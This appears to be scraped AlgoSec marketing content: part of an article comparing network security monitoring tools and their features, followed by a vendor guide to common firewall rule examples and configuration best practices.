regulatory compliance requirements by maintaining records of network activity and security incidents. This gives analysts valuable data for conducting investigations into security events and connect seemingly unrelated incidents into a coherent timeline. What To Evaluate in a Network Monitoring Software Provider Your network monitoring software provider should offer a comprehensive set of features for collecting, analyzing, and responding to suspicious activity anywhere on your network. It should unify management and control of your organization’s IT assets while providing unlimited visibility into how they interact with one another. Comprehensive alerting and reporting Your network monitoring solution must notify you of security incidents and provide detailed reports describing those incidents in real-time. It should include multiple toolsets for collecting performance metrics, conducting in-depth analysis, and generating compliance reports. Future-proof scalability Consider what kind of network monitoring needs your organization might have several years from now. If your monitoring tool cannot scale to accommodate that growth, you may end up locked into a vendor agreement that doesn’t align with your interests. This is especially true with vendors that prioritize on-premises implementations since you run the risk of paying for equipment and services that you don’t actually use. Cloud-delivered software solutions often perform better in use cases where flexibility is important. Integration with your existing IT infrastructure Your existing security tech stack may include a selection of SIEM platforms, IDS/IPS systems, firewalls , and endpoint security solutions. Your network security monitoring software will need to connect all of these tools and platforms together in order to grant visibility into network traffic flows between them. Misconfigurations and improper integrations can result in dangerous security vulnerabilities. A high-performance vulnerability scanning solution may be able to detect these misconfigurations so you can fix them proactively. Intuitive user experience for security teams and IT admins Complex tools often come with complex management requirements. This can create a production bottleneck when there aren’t enough fully-trained analysts on the IT security team. Monitoring tools designed for ease of use can improve security performance by reducing training costs and allowing team members to access monitoring insights more easily. Highly automated tools can drive even greater performance benefits by reducing the need for manual control altogether. Excellent support and documentation Deploying network security monitoring tools is not always a straightforward task. Most organizations will need to rely on expert support to assist with implementation, troubleshooting, and ongoing maintenance. Some vendors provide better technical support to customers than others, and this difference is often reflected in the price. Some organizations work with managed service providers who can offset some of their support and documentation needs by providing on-demand expertise when needed. Pricing structures that work for you Different vendors have different pricing structures. When comparing network monitoring tools, consider the total cost of ownership including licensing fees, hardware requirements, and any additional costs for support or updates. Certain usage models will fit your organization’s needs better than others, and you’ll have to document them carefully to avoid overpaying. Compliance and reporting capabilities If you plan on meeting compliance requirements for your organization, you will need a network security monitoring tool that can generate the necessary reports and logs to meet these standards. Every set of standards is different, but many reputable vendors offer solutions for meeting specific compliance criteria. Find out if your network security monitoring vendor supports compliance standards like PCI DSS, HIPAA, and NIST. A good reputation for customer success Research the reputation and track record of every vendor you could potentially work with. Every vendor will tell you that they are the best – ask for evidence to back up their claims. Vendors with high renewal rates are much more likely to provide you with valuable security technology than lower-priced competitors with a significant amount of customer churn. Pay close attention to reviews and testimonials from independent, trustworthy sources. Compatibility with network infrastructure Your network security monitoring tool must be compatible with the entirety of your network infrastructure. At the most basic level, it must integrate with your hardware fleet of routers, switches, and endpoint devices. If you use devices with non-compatible operating systems, you risk introducing blind spots into your security posture. For the best results, you must enjoy in-depth observability for every hardware and software asset in your network, from the physical layer to the application layer. Regular updates and maintenance Updates are essential to keep security tools effective against evolving threats. Check the update frequency of any monitoring tool you consider implementing and look for the specific security vulnerabilities addressed in those updates. If there is a significant delay between the public announcement of new vulnerabilities and the corresponding security patch, your monitoring tools may be vulnerable during that period of time. 9 Best Network Security Monitoring Providers for Identifying Cybersecurity Threats 1. AlgoSec AlgoSec is a network security policy management solution that helps organizations automate and orchestrate network security policies. It keeps firewall rules , routers, and other security devices configured correctly, ensuring network assets are secured properly. AlgoSec protects organizations from misconfigurations that can lead to malware, ransomware, and phishing attacks, and gives security teams the ability to proactively simulate changes to their IT infrastructure. 2. SolarWinds SolarWinds offers a range of network management and monitoring solutions, including network security monitoring tools that detect changes to security policies and traffic flows. It provides tools for network visibility and helps identify and respond to security incidents. However, SolarWinds can be difficult for some organizations to deploy because customers must purchase additional on-premises hardware. 3. Security Onion Security Onion is an open-source Linux distribution designed for network security monitoring. It integrates multiple monitoring tools like Snort, Suricata, Bro, and others into a single platform, making it easier to set up and manage a comprehensive network security monitoring solution. As an open-source option, it is one of the most cost-effective solutions available on the market, but may require additional development resources to customize effectively for your organization’s needs. 4. ELK Stack Elastic ELK Stack is a combination of three open-source tools: Elasticsearch, Logstash, and Kibana. It’s commonly used for log data and event analysis. You can use it to centralize logs, perform real-time analysis, and create dashboards for network security monitoring. The toolset provides high-quality correlation through large data sets and provides security teams with significant opportunities to improve security and network performance using automation. 5. Cisco Stealthwatch Cisco Stealthwatch is a commercial network traffic analysis and monitoring solution. It uses NetFlow and other data sources to detect and respond to security threats, monitor network behavior, and provide visibility into your network traffic. It’s a highly effective solution for conducting network traffic analysis, allowing security analysts to identify threats that have infiltrated network assets before they get a chance to do serious damage. 6. Wireshark Wireshark is a widely-used open-source packet analyzer that allows you to capture and analyze network traffic in real-time. It can help you identify and troubleshoot network issues and is a valuable tool for security analysts. Unlike other entries on this list, it is not a fully-featured monitoring platform that collects and analyzes data at scale – it focuses on providing deep visibility into specific data flows one at a time. 7. Snort Snort is an open-source intrusion detection system (IDS) and intrusion prevention system (IPS) that can monitor network traffic for signs of suspicious or malicious activity. It’s highly customizable and has a large community of users and contributors. It supports customized rulesets and is easy to use. Snort is widely compatible with other security technologies, allowing users to feed signature updates and add logging capabilities to its basic functionality very easily. However, it’s an older technology that doesn’t natively support some modern features users will expect it to. 8. Suricata Suricata is another open-source IDS/IPS tool that can analyze network traffic for threats. It offers high-performance features and supports rules compatible with Snort, making it a good alternative. Suricata was developed more recently than Snort, which means it supports modern workflow features like multithreading and file extraction. Unlike Snort, Suricata supports application-layer detection rules and can identify traffic on non-standard ports based on the traffic protocol. 9. Zeek (formerly Bro) Zeek is an open-source network analysis framework that focuses on providing detailed insights into network activity. It can help you detect and analyze potential security incidents and is often used alongside other NSM tools. This tool helps security analysts categorize and model network traffic by protocol, making it easier to inspect large volumes of data. Like Suricata, it runs on the application layer and can differentiate between protocols. Essential Network Monitoring Features Traffic Analysis The ability to capture, analyze, and decode network traffic in real-time is a basic functionality all network security monitoring tools should share. Ideally, it should also include support for various network protocols and allow users to categorize traffic based on those categories. Alerts and Notifications Reliable alerts and notifications for suspicious network activity, enabling timely response to security threats. To avoid overwhelming analysts with data and contributing to alert fatigue, these notifications should consolidate data with other tools in your security tech stack. Log Management Your network monitoring tool should contribute to centralized log management through network devices, apps, and security sensors for easy correlation and analysis. This is best achieved by integrating a SIEM platform into your tech stack, but you may not wish to store all of your network’s logs on the SIEM, because of the added expense. Threat Detection Unlike regular network traffic monitoring, network security monitoring focuses on indicators of compromise in network activity. Your tool should utilize a combination of signature-based detection, anomaly detection, and behavioral analysis to identify potential security threats. Incident Response Support Your network monitoring solution should facilitate the investigation of security incidents by providing contextual information, historical data, and forensic capabilities. It may correlate detected security events so that analysts can conduct investigations more rapidly, and improve security outcomes by reducing false positives. Network Visibility Best-in-class network security monitoring tools offer insights into network traffic patterns, device interactions, and potential blind spots to enhance network monitoring and troubleshooting. To do this, they must connect with every asset on the network and successfully observe data transfers between assets. Integration No single security tool can be trusted to do everything on its own. Your network security monitoring platform must integrate with other security solutions, such as firewalls, intrusion detection/prevention systems (IDS/IPS), and SIEM platforms to create a comprehensive security ecosystem. If one tool fails to detect malicious activity, another may succeed. Customization No two organizations are the same. The best network monitoring solutions allow users to customize rules, alerts, and policies to align with specific security requirements and network environments. These customizations help security teams reduce alert fatigue and focus their efforts on the most important data traffic flows on the network. Advanced Features for Identifying Vulnerabilities & Weaknesses Threat Intelligence Integration Threat intelligence feeds enhance threat detection and response capabilities by providing in-depth information about the tactics, techniques, and procedures used by threat actors. These feeds update constantly to reflect the latest information on cybercriminal activities so analysts always have the latest data. Forensic Capabilities Detailed data and forensic tools provide in-depth analysis of security breaches and related incidents, allowing analysts to attribute attacks to hackers and discover the extent of cyberattacks. With retroactive forensics, investigators can include historical network data and look for evidence of compromise in the past. Automated Response Automated responses to security threats can isolate affected devices or modify firewall rules the moment malicious behavior is detected. Automated detection and response workflows must be carefully configured to avoid business disruptions stemming from misconfigured algorithms repeatedly denying legitimate traffic. Application-level Visibility Some network security monitoring tools can identify and classify network traffic by applications and services , enabling granular control and monitoring. This makes it easier for analysts to categorize traffic based on its protocol, which can streamline investigations into attacks that take place on the application layer. Cloud and Virtual Network Support Cloud-enabled organizations need monitoring capabilities that support cloud environments and virtualized networks. Without visibility into these parts of the hybrid network, security vulnerabilities may go unnoticed. Cloud-native network monitoring tools must include data on public and private cloud instances as well as containerized assets. Machine Learning and AI Advanced machine learning and artificial intelligence algorithms can improve threat detection accuracy and reduce false positives. These features often work by examining large-scale network traffic data and identifying patterns within the dataset. Different vendors have different AI models and varying levels of competence with emerging AI technology. User and Entity Behavior Analytics (UEBA) UEBA platforms monitor asset behaviors to detect insider threats and compromised accounts. This advanced feature allows analysts to assign dynamic risk scores to authenticated users and assets, triggering alerts when their activities deviate too far from their established routine. Threat Hunting Tools Network monitoring tools can provide extra features and workflows for proactive threat hunting and security analysis. These tools may match observed behaviors with known indicators of compromise, or match observed traffic patterns with the tactics, techniques, and procedures of known threat actors. AlgoSec: The Preferred Network Security Monitoring Solution AlgoSec has earned an impressive reputation for its network security policy management capabilities. The platform empowers security analysts and IT administrators to manage and optimize network security policies effectively. It includes comprehensive firewall policy and change management capabilities along with comprehensive solutions for automating application connectivity across the hybrid network. Here are some reasons why IT leaders choose AlgoSec as their preferred network security policy management solution: Policy Optimsization: AlgoSec can analyze firewall rules and network security policies to identify redundant or conflicting rules, helping organizations optimize their security posture and improve rule efficiency. Change Management: It offers tools for tracking and managing changes to firewall and network data policies, ensuring that changes are made in a controlled and compliant manner. Risk Assessment: AlgoSec can assess the potential security risks associated with firewall rule changes before they are implemented, helping organizations make informed decisions. Compliance Reporting: It provides reports and dashboards to assist with compliance audits, making it easier to demonstrate regulatory compliance to regulators. Automation: AlgoSec offers automation capabilities to streamline policy management tasks, reducing the risk of human error and improving operational efficiency. Visibility: It provides visibility into network traffic and policy changes, helping security teams monitor and respond to potential security incidents. Schedule a demo Related Articles 2025 in review: What innovations and milestones defined AlgoSec’s transformative year in 2025? AlgoSec Reviews Mar 19, 2023 · 2 min read Navigating Compliance in the Cloud AlgoSec Cloud Mar 19, 2023 · 2 min read 5 Multi-Cloud Environments Cloud Security Mar 19, 2023 · 2 min read Speak to one of our experts Speak to one of our experts Work email* First name* Last name* Company* country* Select country... Short answer* By submitting this form, I accept AlgoSec's privacy policy Schedule a call

  • Firewall ruleset examples & policy best practices | AlgoSec

    Learn from expert-crafted firewall ruleset examples and best practices. Optimize your security posture with actionable guidance and improve your firewall configurations. Firewall ruleset examples & policy best practices Securing your network: guide to firewall rules examples Cyberattacks continue to rise globally as malicious actors tirelessly develop sophisticated tools and techniques to break through networks and security systems. With the digitalization of operations today and the increasing adoption of remote working, crucial business activities such as communication, data storage, and data transmission are now primarily done digitally. While this brings numerous advantages – allowing easy usability and scalability, enhancing collaboration, and reducing the risks of data loss – businesses have to deal with various security risks, such as data breaches and cyberattacks from hackers. Organizations must provide adequate network security to keep sensitive data safe and ensure their network is usable, trustworthy, and optimized for maximum productivity across all channels. Schedule a Demo Firewalls and your network Your network and systems (software and hardware) comprise the IT infrastructure through which you operate and manage your enterprise’s IT services. Every IT system regularly receives and transmits internet traffic, and businesses must ensure that only trusted and authorized traffic penetrates their network to maintain security. All unwanted traffic must be prevented from accessing your operating system as it poses a huge risk to network security. Malicious actors attempting to penetrate your system often send virus-carrying inbound traffic to your network. However, with an effective firewall, you can filter all traffic and block unwanted and harmful traffic from penetrating your network. A firewall serves as a barrier between computers, networks, and other systems in your IT landscape, preventing unauthorized traffic from penetrating. Schedule a Demo What are firewall rules? The firewall is your first line of defense in network security against hackers, malware, and other threats. Firewall rules refer to access control mechanisms that stipulate how a firewall device should handle incoming and outgoing traffic in your network. They are instructions given to firewalls to help them know when to block or allow communication in your network. These instructions include destination or source IP addresses, protocols, port numbers, and services. A firewall ruleset is formed from a set of rules and it defines a unit of execution and sharing for the rules. Firewall rulesets typically include: A source address A source port A destination address A destination port A decision on whether to block or permit network traffic meeting those address and port criteria Schedule a Demo What are the most common firewall ruleset examples? There are thousands of rulesets that can be used to control how a firewall deals with network traffic. Some firewall rules are more common than others, as they tend to be fundamental when building a secure network. Here are some examples of firewall rules for common use cases: Enable internet access for only one computer in the local network and block access for all others This rule gives only one computer in the local network access to the internet, and blocks all others from accessing the internet. This example requires obtaining the IP address of the computer being granted access (i.e., source IP address) and the TCP protocol type. Two rules will be created: a Permit rule and a Deny rule. The permit rule allows the chosen computer the required access, while the deny rule blocks all other computers in the local network from internet access. Prevent direct access from the public network to the firewall This rule blocks access to your firewall from any public network, to protect it from hackers who can modify or delete your rules if they access your firewall directly. Once hackers manipulate your rules, unwanted traffic will penetrate your network, leading to data breaches or an interruption in operation. A Deny rule for any attempt to access the firewall from public networks will be created and enabled. Block internet access for only one computer in the local network This rule comes in handy if you do not want a specific computer in the local network to access the internet. You will need to create a Deny rule in which you set the IP address of the computer you wish to block from the internet, and the TCP protocol type. Block access to a specific website from a local network In this scenario we want to configure our firewall to deny access to a particular website from a local network. We first obtain the IP address or addresses of the website we wish to deny access to, and then create a Deny rule. One way to obtain a website’s IP address is by running the special command ‘nslookup ’ in your operating system’s command line (Windows, Linux, or others). Since websites can run on HTTP and HTTPS, we must create a Deny rule for each protocol type and indicate the destination IP address(es). Thus, the local network will be unable to access both the HTTP and HTTPS versions of the website. Allow a particular LAN computer to access only one specific website This example gives a local computer access to only one specified website. We obtain the IP address of the destination website and the source IP address (of the local computer). We create a Permit rule for the source IP address and the destination website, and a Deny rule for the source IP address and other websites, taking the TCP protocol types into account. Allow internet access to and from the local network using specific protocols (services) only This example allows your LAN computer to access the internet using specific protocols, such as SMTP, FTP, IPv6, SSH, IPv4, POP3, DNS, and IMAP; and blocks all other traffic Here we first create an “Allow” rule for the “Home segment,” where we use the value “Any” for the Source and Destination IP addresses. In the Protocol field provided, we choose the protocols through which our local computer can access the internet. Lastly, we create Deny rules where we enter the value “Any” for the Source and Destination IP addresses. In the Protocol field, we set the values TCP and UDP, thus blocking internet access for unspecified protocols. Allow remote control of your router This rule enables you to access, view, or change your Router Settings remotely (over the internet). Typically, access to routers from the internet is blocked by default. To set this rule, you need specific data such as your router username, WAN IP address, and password. It is crucial to note that this setting is unsafe for individuals who use public IP addresses. A similar use case is a rule enabling users to check a device’s availability on their network by allowing ICMP ping requests. Block access from a defined internet subnet or an external network You can set a rule that blocks access to your network from a defined internet subnet or an external network. This rule is especially important if you observed repeated attempts to access your router from unknown IP addresses within the same subnet. In this case, set a Deny rule for IP addresses of the subnet attempting to access your WAN port. Schedule a Demo What are examples of best practices for setting up firewall rules? It is expedient to follow best practices during firewall configuration to protect your network from intruders and hackers. Deploying industry-standard rules when setting up firewalls can improve the security of your network and system components. Below are examples of the best practices for setting up firewall rules. Document firewall rules across multiple devices Documenting all firewall rule configurations and updating them frequently across various devices is one of the best practices for staying ahead of attacks. New rules should be included based on security needs, and irrelevant rules should be deactivated to reduce the possibility of a loophole in your network. With documentation, administrators can review the rules frequently and make any required changes whenever a vulnerability is detected. Configure your firewall to block traffic by default Using a block or deny-by-default policy is the safest way to deal with suspicious traffic. Enterprises must be sure that all types of traffic entering their network are identified and trusted to avoid security threats. In addition, whenever a vulnerability arises in the system, blocking by default helps prevent hackers from taking advantage of loopholes before administrators can respond. Monitor firewall logs Monitoring firewall logs on a regular basis helps maintain network security. Administrators can quickly and easily track traffic flow across your network, identify suspicious activity, and implement effective solutions in a timely manner. Organizations with highly sophisticated infrastructure can aggregate logs from routers, servers, switches, and other components to a centralized platform for monitoring. Group firewall rules to minimize complexity and enhance performance Depending on the complexity of your network, you may need thousands of rules to achieve effective network security. This complicates your firewall rules and can be a huge challenge for administrators. However, by grouping rules based on similar characteristics like protocols, TCP ports, IP addresses, etc., you simplify them and boost overall performance. Implement least-privileged access In any organization, employees have various roles and may require different data to execute their tasks efficiently. As part of network security practices, it’s important to ensure each employee’s access to the network is restricted to the minimum privileges needed to execute their tasks. Only users who require access to a particular service or resource should have it, thus preventing unnecessary exposure of data. This practice significantly minimizes the risk of intentional and accidental unauthorized access to sensitive data. Schedule a Demo How do firewall policies differ from a network security policy? A network security policy outlines the overall rules, principles, and procedures for maintaining security on a computer network. The policy sets out the basic architecture of an organization’s network security environment, including details of how the security policies are implemented. The overall objective of network security policy is to protect a computer network against internal and external threats. Firewall policies are a sub-group of network security policies, and refer to policies that relate specifically to firewalls. Firewall policies have to do with rules for how firewalls should handle inbound and outbound traffic to ensure that malicious actors do not penetrate the network. A firewall policy determines the types of traffic that should flow through your network based on your organization’s network and information security policies. Schedule a Demo How can AlgoSec help with managing your firewall rules? Proper firewall configuration with effective rules and practices is crucial to building a formidable network security policy. Organizations must follow industry standards in configuring firewall rules and protecting their IT landscape from intruders and malicious actors. Firewall rules require regular review and update to maintain maximum protection against evolving threats and changing security demands. For many organizations, keeping up with these fast-paced security demands can be challenging, and that’s where AlgoSec comes in. AlgoSec helps with managing your firewall rules to ensure your network enjoys round-the-clock protection against internal and external security threats. From installation to maintenance, we assist you in setting up a resilient firewall that operates on the safest rulesets to keep your network safe against harmful traffic. We have dedicated tools that take away the burden of aggregating and analyzing logs from the components in your network, including computers, routers, web servers, switches, etc. We determine which new rules are needed for effective firewall network security policy management based on data from your firewall devices and security trends. AlgoSec will ensure your firewall stays compliant with best practices by applying our automated auditing solution, which identifies gaps in your firewall rules and enables you to remediate them before hackers take advantage of such loopholes. Schedule a Demo Select a size Securing your network: guide to firewall rules examples Firewalls and your network What are firewall rules? What are the most common firewall ruleset examples? What are examples of best practices for setting up firewall rules? How do firewall policies differ from a network security policy? How can AlgoSec help with managing your firewall rules? Get the latest insights from the experts Use these six best practices to simplify compliance and risk White paper Learn how AlgoSec can help you pass PCI-DSS Audits and ensure Solution overview See how this customer improved compliance readiness and risk Case study Choose a better way to manage your network

bottom of page